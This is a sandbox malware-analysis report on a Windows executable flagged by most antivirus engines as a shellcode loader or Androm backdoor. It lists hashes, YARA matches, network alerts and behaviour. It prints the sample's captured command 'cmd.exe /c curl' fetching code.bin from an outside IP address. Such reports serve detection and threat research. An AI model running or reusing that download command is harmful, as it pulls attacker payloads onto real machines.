Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 19, 2024, 1:02 p.m.	July 19, 2024, 1:04 p.m.

Size	1.7MB
Type	MS-DOS executable, MZ for MS-DOS
MD5	`0b6072d47b53fa8d3f9b28b449192dcc`
SHA256	`fb551ab74d9835dbaa9c305b206aa8ceec12ade2c82a947f9907d9284b3bb218`
CRC32	`1BBD9E21`
ssdeep	`24576:GkX39LoEpiCMd/OZBsarEyAB03srHdyyt72Ph1B4JhkeXQ4p+pbReM1/:XX34wFdh/`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE64 - (no description) UPX_Zero - UPX packed file Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
47.128.226.30	Active	Moloch

Flow	SID	Signature	Category
TCP 192.168.56.101:49164 -> 47.128.226.30:80	2018752	ET HUNTING Generic .bin download from Dotted Quad	Potentially Bad Traffic
TCP 192.168.56.101:49164 -> 47.128.226.30:80	2034567	ET HUNTING curl User-Agent to Dotted Quad	Potentially Bad Traffic

No Suricata TLS

packer

Microsoft Visual C++ V8.0 (Debug)

Time & API	Arguments	Status	Return	Repeated
__exception__ July 19, 2024, 12:50 p.m.	stacktrace: 0x5101ca exception.instruction_r: ff 99 00 00 00 00 00 00 00 00 00 00 00 00 00 00 exception.instruction: lcall ptr [rcx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x5101ca registers.r14: 2947160 registers.r15: 0 registers.rcx: 0 registers.rsi: 2947024 registers.r10: 1453503984 registers.rbx: 1453503984 registers.rsp: 2946928 registers.r11: 582 registers.r8: 2946744 registers.r9: 5308426 registers.rdx: 8796092837888 registers.r12: 2946736 registers.rbp: 5308426 registers.rdi: 108 registers.rax: 498139398 registers.r13: 2946744	1	0	0

suspicious_features

Connection to IP address

suspicious_request

GET http://47.128.226.30/code.bin

request

GET http://47.128.226.30/code.bin

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory July 19, 2024, 12:50 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000510000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0	0

cmdline

C:\Windows\system32\cmd.exe /c curl http://47.128.226.30/code.bin

host

47.128.226.30

Bkav	W64.AIDetectMalware
Lionic	Trojan.Win32.Shellcode.m!c
Skyhigh	BehavesLike.Win64.Generic.tt
ALYac	Generic.Shellcode.Loader.Marte.X.9A1BD937
Cylance	Unsafe
VIPRE	Generic.Shellcode.Loader.Marte.X.9A1BD937
Sangfor	Backdoor.Win32.Androm.Vaxf
BitDefender	Generic.Shellcode.Loader.Marte.X.9A1BD937
Cybereason	malicious.47b53f
Arcabit	Generic.Shellcode.Loader.Marte.X.9A1BD937
Symantec	ML.Attribute.HighConfidence
McAfee	Artemis!0B6072D47B53
Avast	MalwareX-gen [Trj]
Kaspersky	Backdoor.Win32.Androm.vrxi
MicroWorld-eScan	Generic.Shellcode.Loader.Marte.X.9A1BD937
Rising	Backdoor.Androm!8.113 (C64:YzY0Osgm5GUpjuEX)
Emsisoft	Generic.Shellcode.Loader.Marte.X.9A1BD937 (B)
F-Secure	Backdoor.BDS/Androm.owaro
McAfeeD	ti!FB551AB74D98
FireEye	Generic.mg.0b6072d47b53fa8d
Sophos	Mal/Swrort-Y
Ikarus	Trojan.Nekark
Webroot	W32.Trojan.Gen
Google	Detected
Avira	BDS/Androm.owaro
MAX	malware (ai score=86)
Kingsoft	Win32.Hack.Androm.vrxi
Gridinsoft	Trojan.Win64.Packed.sa
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	Backdoor.Win32.Androm.vrxi
GData	Win64.Packed.Shellcode.C
Varist	W64/ABTrojan.UUZN-8340
DeepInstinct	MALICIOUS
Malwarebytes	Generic.Malware/Suspicious
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R002H09GI24
SentinelOne	Static AI - Malicious PE
Fortinet	PossibleThreat.PALLAS.H
AVG	MalwareX-gen [Trj]
Paloalto	generic.ml
CrowdStrike	win/malicious_confidence_100% (W)
alibabacloud	Trojan:MSDOS/Shellcode.Labqct

dead_host	192.168.56.101:49166
dead_host	47.128.226.30:443

safe_shell.shc.exe